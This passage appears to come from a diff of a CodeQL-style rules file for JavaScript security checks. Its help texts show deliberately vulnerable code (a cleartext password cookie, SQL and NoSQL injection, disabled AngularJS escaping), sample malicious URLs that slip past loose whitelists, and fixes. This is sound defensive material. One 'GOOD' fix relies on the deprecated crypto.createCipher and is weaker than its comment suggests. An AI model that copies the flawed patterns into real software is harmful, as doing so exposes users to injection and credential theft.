This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. 
Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", - "markdown" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = 
req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], - "description" : "Sensitive information stored without encryption or hashing can expose it to an\n attacker.", - "id" : "js/clear-text-storage-of-sensitive-data", - "kind" : "path-problem", - "name" : "Clear text storage of sensitive information", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/clear-text-logging", - "name" : "js/clear-text-logging", - "shortDescription" : { - "text" : "Clear-text logging of sensitive information" - }, - "fullDescription" : { - "text" : "Logging sensitive information without encryption or hashing can expose it to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. 
Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n", - "markdown" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. 
Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-359", "external/cwe/cwe-532" ], - "description" : "Logging sensitive information without encryption or hashing can\n expose it to an attacker.", - "id" : "js/clear-text-logging", - "kind" : "path-problem", - "name" : "Clear-text logging of sensitive information", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/build-artifact-leak", - "name" : "js/build-artifact-leak", - "shortDescription" : { - "text" : "Storage of sensitive information in build artifact" - }, - "fullDescription" : { - "text" : "Including sensitive information in a build artifact can expose it to an attacker." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", - "markdown" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` 
configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], - "description" : "Including sensitive information in a build artifact can\n expose it to an attacker.", - "id" : "js/build-artifact-leak", - "kind" : "path-problem", - "name" : "Storage of sensitive information in build artifact", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/sql-injection", - "name" : "js/sql-injection", - "shortDescription" : { - "text" : "Database query built from user-controlled sources" - }, - "fullDescription" : { - "text" : "Building a database query from user-controlled sources is vulnerable to insertion of malicious code by the user." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. 
In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. 
The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n", - "markdown" : "# Database query 
built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. 
This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. 
The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n" - }, - "properties" : { - "tags" : 
[ "security", "external/cwe/cwe-089", "external/cwe/cwe-090", "external/cwe/cwe-943" ], - "description" : "Building a database query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/sql-injection", - "kind" : "path-problem", - "name" : "Database query built from user-controlled sources", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/angular/disabling-sce", - "name" : "js/angular/disabling-sce", - "shortDescription" : { - "text" : "Disabling SCE" - }, - "fullDescription" : { - "text" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "maintainability", "frameworks/angularjs", "external/cwe/cwe-116" ], - "description" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities.", - "id" : "js/angular/disabling-sce", - "kind" : "problem", - "name" : "Disabling SCE", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/angular/double-compilation", - "name" : "js/angular/double-compilation", - "shortDescription" : { - "text" : "Double compilation" - }, - "fullDescription" : { - "text" : "Recompiling an already compiled part of the DOM can lead to unexpected behavior of directives, performance problems, and memory leaks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. 
Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n", - "markdown" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. 
Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n" - }, - "properties" : { - "tags" : [ "reliability", "frameworks/angularjs", "security", "external/cwe/cwe-1176" ], - "description" : "Recompiling an already compiled part of the DOM can lead to\n unexpected behavior of directives, performance problems, and memory leaks.", - "id" : "js/angular/double-compilation", - "kind" : "problem", - "name" : "Double compilation", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : 
"8.8" - } - }, { - "id" : "js/angular/insecure-url-whitelist", - "name" : "js/angular/insecure-url-whitelist", - "shortDescription" : { - "text" : "Insecure URL whitelist" - }, - "fullDescription" : { - "text" : "URL whitelists that are too permissive can cause security vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n", - "markdown" : "# 
Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n" - }, - "properties" : { - "tags" : [ "security", "frameworks/angularjs", "external/cwe/cwe-183", "external/cwe/cwe-625" ], - "description" : "URL whitelists that are too permissive can cause security vulnerabilities.", - "id" : "js/angular/insecure-url-whitelist", - "kind" : "problem", - "name" : "Insecure URL whitelist", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "7.5" 
